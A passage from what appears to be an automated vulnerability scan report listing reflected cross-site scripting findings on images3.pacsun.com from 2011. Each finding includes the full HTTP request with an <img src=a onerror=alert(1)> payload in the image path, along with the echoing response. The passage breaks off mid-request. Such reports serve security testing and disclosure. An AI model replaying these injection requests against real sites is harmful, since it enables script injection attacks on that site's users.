Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:12 GMT
Connection: close

Unable to find /pacsunproducts/8778102_01343d7<img src=a onerror=alert(1)>dbbe95a5ea3

3.216. http://images3.pacsun.com/is/image/pacsunproducts/8787210_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8787210_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eca8c<img%20src%3da%20onerror%3dalert(1)>96263e8f755 was submitted in the REST URL parameter 4. This input was echoed as eca8c<img src=a onerror=alert(1)>96263e8f755 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8787210_01eca8c<img%20src%3da%20onerror%3dalert(1)>96263e8f755?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:14 GMT
Connection: close

Unable to find /pacsunproducts/8787210_01eca8c<img src=a onerror=alert(1)>96263e8f755

3.217. http://images3.pacsun.com/is/image/pacsunproducts/8787798_01_080 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8787798_01_080

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cbf6a<img%20src%3da%20onerror%3dalert(1)>6cbaf6bbc19 was submitted in the REST URL parameter 4. This input was echoed as cbf6a<img src=a onerror=alert(1)>6cbaf6bbc19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8787798_01_080cbf6a<img%20src%3da%20onerror%3dalert(1)>6cbaf6bbc19?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:52 GMT
Connection: close

Unable to find /pacsunproducts/8787798_01_080cbf6a<img src=a onerror=alert(1)>6cbaf6bbc19

3.218. http://images3.pacsun.com/is/image/pacsunproducts/8787798_sw_080 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8787798_sw_080

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 53156<img%20src%3da%20onerror%3dalert(1)>1ede4f59a85 was submitted in the REST URL parameter 4. This input was echoed as 53156<img src=a onerror=alert(1)>1ede4f59a85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8787798_sw_08053156<img%20src%3da%20onerror%3dalert(1)>1ede4f59a85?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:52 GMT
Connection: close

Unable to find /pacsunproducts/8787798_sw_08053156<img src=a onerror=alert(1)>1ede4f59a85

3.219. http://images3.pacsun.com/is/image/pacsunproducts/8787798_sw_945 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8787798_sw_945

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d44c8<img%20src%3da%20onerror%3dalert(1)>f4e2e92266 was submitted in the REST URL parameter 4. This input was echoed as d44c8<img src=a onerror=alert(1)>f4e2e92266 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8787798_sw_945d44c8<img%20src%3da%20onerror%3dalert(1)>f4e2e92266?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:51 GMT
Connection: close

Unable to find /pacsunproducts/8787798_sw_945d44c8<img src=a onerror=alert(1)>f4e2e92266

3.220. http://images3.pacsun.com/is/image/pacsunproducts/8795452_01_020 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8795452_01_020

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ced2e<img%20src%3da%20onerror%3dalert(1)>50ade7bf351 was submitted in the REST URL parameter 4. This input was echoed as ced2e<img src=a onerror=alert(1)>50ade7bf351 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8795452_01_020ced2e<img%20src%3da%20onerror%3dalert(1)>50ade7bf351?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:04 GMT
Connection: close

Unable to find /pacsunproducts/8795452_01_020ced2e<img src=a onerror=alert(1)>50ade7bf351

3.221. http://images3.pacsun.com/is/image/pacsunproducts/8805558_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8805558_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61996<img%20src%3da%20onerror%3dalert(1)>a6903d9492e was submitted in the REST URL parameter 4. This input was echoed as 61996<img src=a onerror=alert(1)>a6903d9492e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8805558_0161996<img%20src%3da%20onerror%3dalert(1)>a6903d9492e?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:13 GMT
Connection: close

Unable to find /pacsunproducts/8805558_0161996<img src=a onerror=alert(1)>a6903d9492e

3.222. http://images3.pacsun.com/is/image/pacsunproducts/8831141_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8831141_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ebcbd<img%20src%3da%20onerror%3dalert(1)>66693aacae0 was submitted in the REST URL parameter 4. This input was echoed as ebcbd<img src=a onerror=alert(1)>66693aacae0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8831141_01ebcbd<img%20src%3da%20onerror%3dalert(1)>66693aacae0?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:24 GMT
Connection: close

Unable to find /pacsunproducts/8831141_01ebcbd<img src=a onerror=alert(1)>66693aacae0

3.223. http://images3.pacsun.com/is/image/pacsunproducts/8842700_01_003 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8842700_01_003

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e7088<img%20src%3da%20onerror%3dalert(1)>9d68a8ca440 was submitted in the REST URL parameter 4. This input was echoed as e7088<img src=a onerror=alert(1)>9d68a8ca440 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8842700_01_003e7088<img%20src%3da%20onerror%3dalert(1)>9d68a8ca440?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:06 GMT
Connection: close

Unable to find /pacsunproducts/8842700_01_003e7088<img src=a onerror=alert(1)>9d68a8ca440

3.224. http://images3.pacsun.com/is/image/pacsunproducts/8842700_sw_003 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8842700_sw_003

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b792c<img%20src%3da%20onerror%3dalert(1)>c708b5b3f36 was submitted in the REST URL parameter 4. This input was echoed as b792c<img src=a onerror=alert(1)>c708b5b3f36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8842700_sw_003b792c<img%20src%3da%20onerror%3dalert(1)>c708b5b3f36?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:06 GMT
Connection: close

Unable to find /pacsunproducts/8842700_sw_003b792c<img src=a onerror=alert(1)>c708b5b3f36

3.225. http://images3.pacsun.com/is/image/pacsunproducts/8842700_sw_242 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8842700_sw_242

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 30611<img%20src%3da%20onerror%3dalert(1)>09d6acce984 was submitted in the REST URL parameter 4. This input was echoed as 30611<img src=a onerror=alert(1)>09d6acce984 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8842700_sw_24230611<img%20src%3da%20onerror%3dalert(1)>09d6acce984?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:06 GMT
Connection: close

Unable to find /pacsunproducts/8842700_sw_24230611<img src=a onerror=alert(1)>09d6acce984

3.226. http://images3.pacsun.com/is/image/pacsunproducts/8844706_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8844706_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6107d<img%20src%3da%20onerror%3dalert(1)>e624fee1427 was submitted in the REST URL parameter 4. This input was echoed as 6107d<img src=a onerror=alert(1)>e624fee1427 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8844706_016107d<img%20src%3da%20onerror%3dalert(1)>e624fee1427?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:16 GMT
Connection: close

Unable to find /pacsunproducts/8844706_016107d<img src=a onerror=alert(1)>e624fee1427

3.227. http://images3.pacsun.com/is/image/pacsunproducts/8861239_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8861239_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3f5bb<img%20src%3da%20onerror%3dalert(1)>a491f4508bc was submitted in the REST URL parameter 4. This input was echoed as 3f5bb<img src=a onerror=alert(1)>a491f4508bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8861239_013f5bb<img%20src%3da%20onerror%3dalert(1)>a491f4508bc?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
